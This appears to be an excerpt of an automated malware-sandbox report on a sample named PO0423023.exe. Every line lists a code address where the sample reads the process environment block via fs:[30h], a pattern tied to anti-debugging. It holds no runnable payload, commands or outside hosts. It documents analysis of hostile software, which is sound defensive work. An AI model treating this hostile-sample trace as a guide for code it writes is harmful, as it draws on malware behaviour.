Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A42349 mov eax, dword ptr fs:[00000030h]	3_2_01A42349
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A42349 mov eax, dword ptr fs:[00000030h]	3_2_01A42349
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A42349 mov eax, dword ptr fs:[00000030h]	3_2_01A42349
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A42349 mov eax, dword ptr fs:[00000030h]	3_2_01A42349
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A42349 mov eax, dword ptr fs:[00000030h]	3_2_01A42349
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A68350 mov ecx, dword ptr fs:[00000030h]	3_2_01A68350
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4035C mov eax, dword ptr fs:[00000030h]	3_2_01A4035C
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4035C mov eax, dword ptr fs:[00000030h]	3_2_01A4035C
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4035C mov eax, dword ptr fs:[00000030h]	3_2_01A4035C
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4035C mov ecx, dword ptr fs:[00000030h]	3_2_01A4035C
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4035C mov eax, dword ptr fs:[00000030h]	3_2_01A4035C
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4035C mov eax, dword ptr fs:[00000030h]	3_2_01A4035C
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8A352 mov eax, dword ptr fs:[00000030h]	3_2_01A8A352
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A562A0 mov eax, dword ptr fs:[00000030h]	3_2_01A562A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A562A0 mov ecx, dword ptr fs:[00000030h]	3_2_01A562A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A562A0 mov eax, dword ptr fs:[00000030h]	3_2_01A562A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A562A0 mov eax, dword ptr fs:[00000030h]	3_2_01A562A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A562A0 mov eax, dword ptr fs:[00000030h]	3_2_01A562A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A562A0 mov eax, dword ptr fs:[00000030h]	3_2_01A562A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FE284 mov eax, dword ptr fs:[00000030h]	3_2_019FE284
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FE284 mov eax, dword ptr fs:[00000030h]	3_2_019FE284
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A40283 mov eax, dword ptr fs:[00000030h]	3_2_01A40283
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A40283 mov eax, dword ptr fs:[00000030h]	3_2_01A40283
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A40283 mov eax, dword ptr fs:[00000030h]	3_2_01A40283
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D02A0 mov eax, dword ptr fs:[00000030h]	3_2_019D02A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D02A0 mov eax, dword ptr fs:[00000030h]	3_2_019D02A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CA2C3 mov eax, dword ptr fs:[00000030h]	3_2_019CA2C3
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CA2C3 mov eax, dword ptr fs:[00000030h]	3_2_019CA2C3
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CA2C3 mov eax, dword ptr fs:[00000030h]	3_2_019CA2C3
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CA2C3 mov eax, dword ptr fs:[00000030h]	3_2_019CA2C3
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CA2C3 mov eax, dword ptr fs:[00000030h]	3_2_019CA2C3
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D02E1 mov eax, dword ptr fs:[00000030h]	3_2_019D02E1
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D02E1 mov eax, dword ptr fs:[00000030h]	3_2_019D02E1
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D02E1 mov eax, dword ptr fs:[00000030h]	3_2_019D02E1
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A962D6 mov eax, dword ptr fs:[00000030h]	3_2_01A962D6
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019B823B mov eax, dword ptr fs:[00000030h]	3_2_019B823B
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C6259 mov eax, dword ptr fs:[00000030h]	3_2_019C6259
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BA250 mov eax, dword ptr fs:[00000030h]	3_2_019BA250
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A70274 mov eax, dword ptr fs:[00000030h]	3_2_01A70274
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A70274 mov eax, dword ptr fs:[00000030h]	3_2_01A70274
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A70274 mov eax, dword ptr fs:[00000030h]	3_2_01A70274
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A70274 mov eax, dword ptr fs:[00000030h]	3_2_01A70274
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A70274 mov eax, dword ptr fs:[00000030h]	3_2_01A70274
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A70274 mov eax, dword ptr fs:[00000030h]	3_2_01A70274
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A70274 mov eax, dword ptr fs:[00000030h]	3_2_01A70274
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A70274 mov eax, dword ptr fs:[00000030h]	3_2_01A70274
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A70274 mov eax, dword ptr fs:[00000030h]	3_2_01A70274
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A70274 mov eax, dword ptr fs:[00000030h]	3_2_01A70274
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A70274 mov eax, dword ptr fs:[00000030h]	3_2_01A70274
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A70274 mov eax, dword ptr fs:[00000030h]	3_2_01A70274
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A48243 mov eax, dword ptr fs:[00000030h]	3_2_01A48243
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A48243 mov ecx, dword ptr fs:[00000030h]	3_2_01A48243
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019B826B mov eax, dword ptr fs:[00000030h]	3_2_019B826B
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A9625D mov eax, dword ptr fs:[00000030h]	3_2_01A9625D
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A7A250 mov eax, dword ptr fs:[00000030h]	3_2_01A7A250
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A7A250 mov eax, dword ptr fs:[00000030h]	3_2_01A7A250
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C4260 mov eax, dword ptr fs:[00000030h]	3_2_019C4260
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C4260 mov eax, dword ptr fs:[00000030h]	3_2_019C4260
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C4260 mov eax, dword ptr fs:[00000030h]	3_2_019C4260
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FE59C mov eax, dword ptr fs:[00000030h]	3_2_019FE59C
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A405A7 mov eax, dword ptr fs:[00000030h]	3_2_01A405A7
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A405A7 mov eax, dword ptr fs:[00000030h]	3_2_01A405A7
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A405A7 mov eax, dword ptr fs:[00000030h]	3_2_01A405A7
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F4588 mov eax, dword ptr fs:[00000030h]	3_2_019F4588
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C2582 mov eax, dword ptr fs:[00000030h]	3_2_019C2582
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C2582 mov ecx, dword ptr fs:[00000030h]	3_2_019C2582
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E45B1 mov eax, dword ptr fs:[00000030h]	3_2_019E45B1
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E45B1 mov eax, dword ptr fs:[00000030h]	3_2_019E45B1
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C65D0 mov eax, dword ptr fs:[00000030h]	3_2_019C65D0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FA5D0 mov eax, dword ptr fs:[00000030h]	3_2_019FA5D0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FA5D0 mov eax, dword ptr fs:[00000030h]	3_2_019FA5D0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FE5CF mov eax, dword ptr fs:[00000030h]	3_2_019FE5CF
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FE5CF mov eax, dword ptr fs:[00000030h]	3_2_019FE5CF
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FC5ED mov eax, dword ptr fs:[00000030h]	3_2_019FC5ED
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FC5ED mov eax, dword ptr fs:[00000030h]	3_2_019FC5ED
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EE5E7 mov eax, dword ptr fs:[00000030h]	3_2_019EE5E7
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EE5E7 mov eax, dword ptr fs:[00000030h]	3_2_019EE5E7
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EE5E7 mov eax, dword ptr fs:[00000030h]	3_2_019EE5E7
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EE5E7 mov eax, dword ptr fs:[00000030h]	3_2_019EE5E7
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EE5E7 mov eax, dword ptr fs:[00000030h]	3_2_019EE5E7
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EE5E7 mov eax, dword ptr fs:[00000030h]	3_2_019EE5E7
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EE5E7 mov eax, dword ptr fs:[00000030h]	3_2_019EE5E7
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EE5E7 mov eax, dword ptr fs:[00000030h]	3_2_019EE5E7
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C25E0 mov eax, dword ptr fs:[00000030h]	3_2_019C25E0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EE53E mov eax, dword ptr fs:[00000030h]	3_2_019EE53E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EE53E mov eax, dword ptr fs:[00000030h]	3_2_019EE53E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EE53E mov eax, dword ptr fs:[00000030h]	3_2_019EE53E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EE53E mov eax, dword ptr fs:[00000030h]	3_2_019EE53E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EE53E mov eax, dword ptr fs:[00000030h]	3_2_019EE53E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A56500 mov eax, dword ptr fs:[00000030h]	3_2_01A56500
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0535 mov eax, dword ptr fs:[00000030h]	3_2_019D0535
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0535 mov eax, dword ptr fs:[00000030h]	3_2_019D0535
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0535 mov eax, dword ptr fs:[00000030h]	3_2_019D0535
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0535 mov eax, dword ptr fs:[00000030h]	3_2_019D0535
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0535 mov eax, dword ptr fs:[00000030h]	3_2_019D0535
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0535 mov eax, dword ptr fs:[00000030h]	3_2_019D0535
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A94500 mov eax, dword ptr fs:[00000030h]	3_2_01A94500
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A94500 mov eax, dword ptr fs:[00000030h]	3_2_01A94500
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A94500 mov eax, dword ptr fs:[00000030h]	3_2_01A94500
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A94500 mov eax, dword ptr fs:[00000030h]	3_2_01A94500
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A94500 mov eax, dword ptr fs:[00000030h]	3_2_01A94500
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A94500 mov eax, dword ptr fs:[00000030h]	3_2_01A94500
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A94500 mov eax, dword ptr fs:[00000030h]	3_2_01A94500
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C8550 mov eax, dword ptr fs:[00000030h]	3_2_019C8550
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C8550 mov eax, dword ptr fs:[00000030h]	3_2_019C8550
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F656A mov eax, dword ptr fs:[00000030h]	3_2_019F656A
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F656A mov eax, dword ptr fs:[00000030h]	3_2_019F656A
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F656A mov eax, dword ptr fs:[00000030h]	3_2_019F656A
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4A4B0 mov eax, dword ptr fs:[00000030h]	3_2_01A4A4B0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F44B0 mov ecx, dword ptr fs:[00000030h]	3_2_019F44B0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C64AB mov eax, dword ptr fs:[00000030h]	3_2_019C64AB
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A7A49A mov eax, dword ptr fs:[00000030h]	3_2_01A7A49A
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C04E5 mov ecx, dword ptr fs:[00000030h]	3_2_019C04E5
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A46420 mov eax, dword ptr fs:[00000030h]	3_2_01A46420
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A46420 mov eax, dword ptr fs:[00000030h]	3_2_01A46420
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A46420 mov eax, dword ptr fs:[00000030h]	3_2_01A46420
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A46420 mov eax, dword ptr fs:[00000030h]	3_2_01A46420
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A46420 mov eax, dword ptr fs:[00000030h]	3_2_01A46420
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A46420 mov eax, dword ptr fs:[00000030h]	3_2_01A46420
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A46420 mov eax, dword ptr fs:[00000030h]	3_2_01A46420
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F8402 mov eax, dword ptr fs:[00000030h]	3_2_019F8402
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F8402 mov eax, dword ptr fs:[00000030h]	3_2_019F8402
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F8402 mov eax, dword ptr fs:[00000030h]	3_2_019F8402
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FA430 mov eax, dword ptr fs:[00000030h]	3_2_019FA430
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BE420 mov eax, dword ptr fs:[00000030h]	3_2_019BE420
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BE420 mov eax, dword ptr fs:[00000030h]	3_2_019BE420
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BE420 mov eax, dword ptr fs:[00000030h]	3_2_019BE420
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BC427 mov eax, dword ptr fs:[00000030h]	3_2_019BC427
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E245A mov eax, dword ptr fs:[00000030h]	3_2_019E245A
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4C460 mov ecx, dword ptr fs:[00000030h]	3_2_01A4C460
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019B645D mov eax, dword ptr fs:[00000030h]	3_2_019B645D
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FE443 mov eax, dword ptr fs:[00000030h]	3_2_019FE443
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FE443 mov eax, dword ptr fs:[00000030h]	3_2_019FE443
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FE443 mov eax, dword ptr fs:[00000030h]	3_2_019FE443
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FE443 mov eax, dword ptr fs:[00000030h]	3_2_019FE443
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FE443 mov eax, dword ptr fs:[00000030h]	3_2_019FE443
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FE443 mov eax, dword ptr fs:[00000030h]	3_2_019FE443
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FE443 mov eax, dword ptr fs:[00000030h]	3_2_019FE443
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FE443 mov eax, dword ptr fs:[00000030h]	3_2_019FE443
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EA470 mov eax, dword ptr fs:[00000030h]	3_2_019EA470
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EA470 mov eax, dword ptr fs:[00000030h]	3_2_019EA470
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EA470 mov eax, dword ptr fs:[00000030h]	3_2_019EA470
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A7A456 mov eax, dword ptr fs:[00000030h]	3_2_01A7A456
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A747A0 mov eax, dword ptr fs:[00000030h]	3_2_01A747A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6678E mov eax, dword ptr fs:[00000030h]	3_2_01A6678E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C07AF mov eax, dword ptr fs:[00000030h]	3_2_019C07AF
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4E7E1 mov eax, dword ptr fs:[00000030h]	3_2_01A4E7E1
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CC7C0 mov eax, dword ptr fs:[00000030h]	3_2_019CC7C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C47FB mov eax, dword ptr fs:[00000030h]	3_2_019C47FB
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C47FB mov eax, dword ptr fs:[00000030h]	3_2_019C47FB
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A407C3 mov eax, dword ptr fs:[00000030h]	3_2_01A407C3
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E27ED mov eax, dword ptr fs:[00000030h]	3_2_019E27ED
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E27ED mov eax, dword ptr fs:[00000030h]	3_2_019E27ED
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E27ED mov eax, dword ptr fs:[00000030h]	3_2_019E27ED
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C0710 mov eax, dword ptr fs:[00000030h]	3_2_019C0710
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F0710 mov eax, dword ptr fs:[00000030h]	3_2_019F0710
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3C730 mov eax, dword ptr fs:[00000030h]	3_2_01A3C730
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FC700 mov eax, dword ptr fs:[00000030h]	3_2_019FC700
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F273C mov eax, dword ptr fs:[00000030h]	3_2_019F273C
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F273C mov ecx, dword ptr fs:[00000030h]	3_2_019F273C
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F273C mov eax, dword ptr fs:[00000030h]	3_2_019F273C
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FC720 mov eax, dword ptr fs:[00000030h]	3_2_019FC720
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FC720 mov eax, dword ptr fs:[00000030h]	3_2_019FC720
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C0750 mov eax, dword ptr fs:[00000030h]	3_2_019C0750
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F674D mov esi, dword ptr fs:[00000030h]	3_2_019F674D
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F674D mov eax, dword ptr fs:[00000030h]	3_2_019F674D
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F674D mov eax, dword ptr fs:[00000030h]	3_2_019F674D
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C8770 mov eax, dword ptr fs:[00000030h]	3_2_019C8770
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0770 mov eax, dword ptr fs:[00000030h]	3_2_019D0770
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0770 mov eax, dword ptr fs:[00000030h]	3_2_019D0770
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0770 mov eax, dword ptr fs:[00000030h]	3_2_019D0770
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0770 mov eax, dword ptr fs:[00000030h]	3_2_019D0770
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0770 mov eax, dword ptr fs:[00000030h]	3_2_019D0770
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0770 mov eax, dword ptr fs:[00000030h]	3_2_019D0770
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0770 mov eax, dword ptr fs:[00000030h]	3_2_019D0770
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0770 mov eax, dword ptr fs:[00000030h]	3_2_019D0770
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0770 mov eax, dword ptr fs:[00000030h]	3_2_019D0770
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0770 mov eax, dword ptr fs:[00000030h]	3_2_019D0770
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0770 mov eax, dword ptr fs:[00000030h]	3_2_019D0770
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0770 mov eax, dword ptr fs:[00000030h]	3_2_019D0770
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02750 mov eax, dword ptr fs:[00000030h]	3_2_01A02750
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02750 mov eax, dword ptr fs:[00000030h]	3_2_01A02750
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A44755 mov eax, dword ptr fs:[00000030h]	3_2_01A44755
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4E75D mov eax, dword ptr fs:[00000030h]	3_2_01A4E75D
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C4690 mov eax, dword ptr fs:[00000030h]	3_2_019C4690
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C4690 mov eax, dword ptr fs:[00000030h]	3_2_019C4690
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F66B0 mov eax, dword ptr fs:[00000030h]	3_2_019F66B0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FC6A6 mov eax, dword ptr fs:[00000030h]	3_2_019FC6A6
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3E6F2 mov eax, dword ptr fs:[00000030h]	3_2_01A3E6F2
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3E6F2 mov eax, dword ptr fs:[00000030h]	3_2_01A3E6F2
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3E6F2 mov eax, dword ptr fs:[00000030h]	3_2_01A3E6F2
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3E6F2 mov eax, dword ptr fs:[00000030h]	3_2_01A3E6F2
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A406F1 mov eax, dword ptr fs:[00000030h]	3_2_01A406F1
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A406F1 mov eax, dword ptr fs:[00000030h]	3_2_01A406F1
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FA6C7 mov ebx, dword ptr fs:[00000030h]	3_2_019FA6C7
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FA6C7 mov eax, dword ptr fs:[00000030h]	3_2_019FA6C7
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D260B mov eax, dword ptr fs:[00000030h]	3_2_019D260B
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D260B mov eax, dword ptr fs:[00000030h]	3_2_019D260B
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D260B mov eax, dword ptr fs:[00000030h]	3_2_019D260B
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D260B mov eax, dword ptr fs:[00000030h]	3_2_019D260B
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D260B mov eax, dword ptr fs:[00000030h]	3_2_019D260B
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D260B mov eax, dword ptr fs:[00000030h]	3_2_019D260B
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D260B mov eax, dword ptr fs:[00000030h]	3_2_019D260B
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3E609 mov eax, dword ptr fs:[00000030h]	3_2_01A3E609
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C262C mov eax, dword ptr fs:[00000030h]	3_2_019C262C
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02619 mov eax, dword ptr fs:[00000030h]	3_2_01A02619
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019DE627 mov eax, dword ptr fs:[00000030h]	3_2_019DE627
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F6620 mov eax, dword ptr fs:[00000030h]	3_2_019F6620
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F8620 mov eax, dword ptr fs:[00000030h]	3_2_019F8620
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8866E mov eax, dword ptr fs:[00000030h]	3_2_01A8866E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8866E mov eax, dword ptr fs:[00000030h]	3_2_01A8866E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019DC640 mov eax, dword ptr fs:[00000030h]	3_2_019DC640
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F2674 mov eax, dword ptr fs:[00000030h]	3_2_019F2674
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FA660 mov eax, dword ptr fs:[00000030h]	3_2_019FA660
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FA660 mov eax, dword ptr fs:[00000030h]	3_2_019FA660
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A489B3 mov esi, dword ptr fs:[00000030h]	3_2_01A489B3
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A489B3 mov eax, dword ptr fs:[00000030h]	3_2_01A489B3
